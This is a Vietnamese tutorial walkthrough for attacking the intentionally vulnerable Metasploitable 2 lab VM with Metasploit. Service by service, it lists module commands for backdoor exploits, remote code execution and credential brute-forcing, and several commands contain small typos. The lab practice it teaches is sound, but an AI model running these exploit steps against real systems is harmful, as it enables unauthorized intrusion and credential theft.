Hacking with Metasploit 2

0
5454

Chương 2 Khai thác các dịch vụ trong Metasploitable 2

Metasploitable là một máy ảo Linux có mục đích tạo ra môi trường lỗ hổng để ta có thể thực hành tấn công (pentesting).

Download tại: https://sourceforge.net/projects/metasploitable/

Mở bằng VMWare workstation và đăng nhập với username/password: msfadmin / msfadmin

Trong bài báo cáo này sẽ dùng lab với máy ảo Kali linux 2019.3 (192.168.42.133) và Metasploitable (192.168.42.129).

1 Quét cổng với công cụ Nmap

nmap -sV -O -v 192.168.42.129

2 Khai thác cổng 21: FTP

Dùng search vsftpd trong metasploit

Bây giờ tiến hành khai thác:

use exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS 192.168.42.129

exploit

Vậy là chúng ta đã có được command shell của máy remote (192.168.42.129)

Đánh help để xem trợ giúp các lệnh của shell. Vì máy remote là một máy Linux nên chúng ta có thể sử dụng các lệnh như một máy Linux/Unix.

3. Khai thác port 22 SSH

Giả sử chúng ta đã biết được username / password của máy bị attack (dịch vụ SSH). Bây giờ chúng ta sẽ khai thác port 22 trên máy ảo metasploitable.

Metasploit có một chức năng auxiliary mà chúng ta sẽ sử dụng trên dịch vụ SSH chạy trên cổng 22. Một khi chúng ta có được session chúng ta có thể nâng cấp lên phiên meterpreter.

use auxiliary/scanner/ssh/ssh_login

set RHOSTS 192.168.42.129

set USER_FILE /root/Desktop/user.txt

set PASS_FILE /root/Desktop/pass.txt

exploit

Sau khi nâng cấp từ shell lên meterpreter dùng lệnh sessions –u 1

4. Khai thác port 23 TELNET

use auxiliary/scanner/telnet/telnet_login

set rhosts 192.168.42.129

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass.txt

set stop_on_success true

exploit

5 Khai thác port 139 và 445 (Samba)

Samba đang chạy trên cả cổng 139 và 445, chúng tôi sẽ khai thác nó bằng Metasploit. Cổng mặc định cho khai thác này được đặt thành cổng 139 nhưng cũng có thể thay đổi thành cổng 445.

use exploit/multi/samba/usermap_script

set rhosts 192.168.42.129

exploit

Sau khi đã có phiên session chúng ta có thể nâng cấp lên thành phiên meterpreter bằng lệnh sesions –u -1. Lưu ý số 1 ở đây là session 1 đã tạo ra ở trên.

6 Khai thác port 8080 (Java)

use exploit/multi/misc/java_rmi_server

set rhosts 192.168.42.129

exploit

7 Khai thác port 5432 (Postgres)

use exploit/linux/postgres/postgres_payload

set rhosts 192.168.42.129

exploit

8 Khai thác Port 6667 (UnrealIRCD)

Cổng 6667 có dịch vụ IRCD Unreal đang chạy, chúng tôi sẽ khai thác bằng cách sử dụng một backdoor có sẵn trong Metasploit.

use exploit/unix/irc/unreal_ircd_3281_backdoor

set rhosts 192.168.42.129

exploit

9 Khai thác port 36255

Đây là một điểm yếu cho phép các lệnh tùy ý trên các hệ thống chạy distccd. Chúng ta sẽ thực thi lệnh của Distcc Daemon. Mô-đun này sử dụng điểm yếu bảo mật được ghi lại để thực thi các lệnh tùy ý trên bất kỳ hệ thống nào chạy distccd.

use exploit/unix/misc/distcc_exec

set rhosts 192.168.42.129

exploit

10 Khai thác đăng nhập từ xa (Remote Login)

use auxiliary/scanner/rservices/rlogin_login

set rhosts 192.168.42.129

set username root

exploit

11 Exploiting Distributed Ruby Remote Code Execution (8787)

use exploit/linux/misc/drb_remote_codeexec

set rhosts 192.168.42.129

exploit

12Bindshell Exploitation

Metasploitable 2 đi kèm với dịch vụ bindshell mở chạy trên cổng 1524. Chúng ta sẽ sử dụng Netcat để kết nối với nó.

13 Exploiting Port 5900 (VNC)

Virtual Network Computing hoặc dịch vụ VNC chạy trên cổng 5900, dịch vụ này có thể được khai thác bằng cách sử dụng một mô-đun trong Metasploit để tìm thông tin đăng nhập.

use auxiliary/scanner/vnc/vnc_login

set login 192.168.42.129

exploit

Bây giờ thử kết nối bằng vncviewer với password tìm được ở trên

14 Khai thác Port 8180 (Apache Tomcat)

Trong quá trình quét dịch vụ rằng Apache Tomcat đang chạy trên cổng 8180. Metasploit có một khai thác cho Tomcat mà chúng ta có thể sử dụng để có được một phiên Meterpreter. Khai thác sử dụng thông tin đăng nhập mặc định được sử dụng bởi Tomcat để có quyền truy cập.

use exploit/multi/http/tomcat_mgr_upload

set rhost 192.168.42.129

set rpost 8180

set httpusername tomcat

set httppassword tomcat

exploit

Sau cùng chúng ta cũng không quên tắt máy ảo metasploitable 2 đúng cách bằng lệnh: sudo shutdown –h now

Chúc bạn thành công.

LEAVE A REPLY

Please enter your comment!
Please enter your name here